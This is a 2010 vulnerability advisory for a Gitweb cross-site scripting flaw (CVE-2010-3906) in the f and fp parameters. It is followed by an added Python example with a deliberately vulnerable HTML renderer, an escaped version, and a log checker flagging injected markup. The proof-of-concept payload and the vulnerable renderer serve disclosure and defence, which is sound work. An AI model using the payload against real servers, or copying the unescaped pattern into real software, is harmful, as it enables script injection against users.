Gitweb 1.7.3.3 Cross Site Scripting

Author: Emanuele Gentili
Source: packetstormsecurity.com (PACKETSTORM:96750)
Published: Dec 16, 2010

EPSS: 0.03 (Low), percentile 90.9%

>-8 Description 8-<
Cross-site scripting (XSS) vulnerability in Gitweb 1.7.3.3 and previous versions
allows remote attackers to inject arbitrary web script or HTML code via the f and fp parameters.

>-8 Proof Of Concept 8-<
http://localhost/?p=foo/bar/ph33r.git;a=blobdiff;f=[XSS];fp=[XSS]
[XSS] => "><body onload="alert('xss')"> <a

>-8 Credits 8-<
Emanuele 'emgent' Gentili

>-8 Notes 8-<
http://www.tigersecurity.it/nuova-vulnerabilita-di-gitweb-rilasciata-in-responsible-disclosure-dal-tiger-team-di-tiger-security-s-r-l/index.aspx

>-8 Responsible Disclosure 8-<

13-12-2010 Initial contact with upstream and vendor-sec
13-12-2010 Vendor response and CVE-2010-3906 assignment
15-12-2010 Public disclosure
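The bug class in the Description and Proof Of Concept sections above, shown as an added illustration that is not gitweb's own (Perl) code and not part of the original advisory: a gitweb-style query string with `;` separators is parsed, the `f` and `fp` values are rendered into a path-link fragment first verbatim (the flaw) and then with context-appropriate encoding (URL-encoding inside `href`, HTML-escaping with quotes inside element text), and a small checker flags request lines whose decoded `f`/`fp` values carry HTML metacharacters, which repository file names never legitimately need. The markup layout, function names and the two access-log lines are assumptions constructed for the example; only the payload comes from the advisory.

```python
import html
import re
from urllib.parse import quote, unquote_plus

# The advisory's PoC payload, reused here as constructed test input.
POC_PAYLOAD = '"><body onload="alert(\'xss\')"> <a'


def parse_gitweb_query(query):
    """Parse a gitweb-style query string ("p=...;a=...;f=...") into a dict.
    gitweb accepts ';' as well as '&' as a parameter separator, so both are split."""
    params = {}
    for part in re.split(r"[;&]", query):
        if not part:
            continue
        key, _, value = part.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params


def render_path_links_vulnerable(params):
    """Interpolates f and fp into HTML verbatim: the flaw class the advisory
    describes (illustrative markup, not gitweb's real template)."""
    f = params.get("f", "")
    fp = params.get("fp", "")
    return ('<div class="page_path">'
            f'<a href="?a=blob;f={f}">{f}</a> vs <a href="?a=blob;f={fp}">{fp}</a>'
            '</div>')


def render_path_links_hardened(params):
    """Same markup with encoding chosen per output context: percent-encode the
    value inside href, HTML-escape it (quotes included) inside element text."""
    f = params.get("f", "")
    fp = params.get("fp", "")
    links = [
        f'<a href="?a=blob;f={quote(name, safe="/")}">{html.escape(name, quote=True)}</a>'
        for name in (f, fp)
    ]
    return '<div class="page_path">' + " vs ".join(links) + "</div>"


# Constructed request lines in the shape "GET <target> HTTP/1.1", not real log data.
SAMPLE_LOG = [
    "GET /?p=foo/bar/ph33r.git;a=blobdiff;f=README;fp=README.md HTTP/1.1",
    "GET /?p=foo/bar/ph33r.git;a=blobdiff;"
    "f=%22%3E%3Cbody%20onload%3D%22alert%28%27xss%27%29%22%3E%20%3Ca;fp=x HTTP/1.1",
]


def suspicious_path_params(request_line):
    """Return the names among f/fp whose decoded value contains '<', '>' or '"'.
    A repository path never needs these characters, so a hit is a strong
    indicator of an attempt against this bug class in web server logs."""
    fields = request_line.split()
    if len(fields) < 2:
        return []
    _, _, query = fields[1].partition("?")
    params = parse_gitweb_query(query)
    return sorted(k for k in ("f", "fp")
                  if any(ch in params.get(k, "") for ch in '<>"'))


if __name__ == "__main__":
    req = parse_gitweb_query(SAMPLE_LOG[1].split()[1].partition("?")[2])
    print("vulnerable :", render_path_links_vulnerable(req))
    print("hardened   :", render_path_links_hardened(req))
    for line in SAMPLE_LOG:
        print(suspicious_path_params(line), line)
```

Running the block prints the unescaped fragment (the injected `<body onload=...>` survives intact), the hardened fragment (the same bytes rendered as inert text and a percent-encoded href), and the checker result for both sample lines; only the second line is flagged, on parameter `f`.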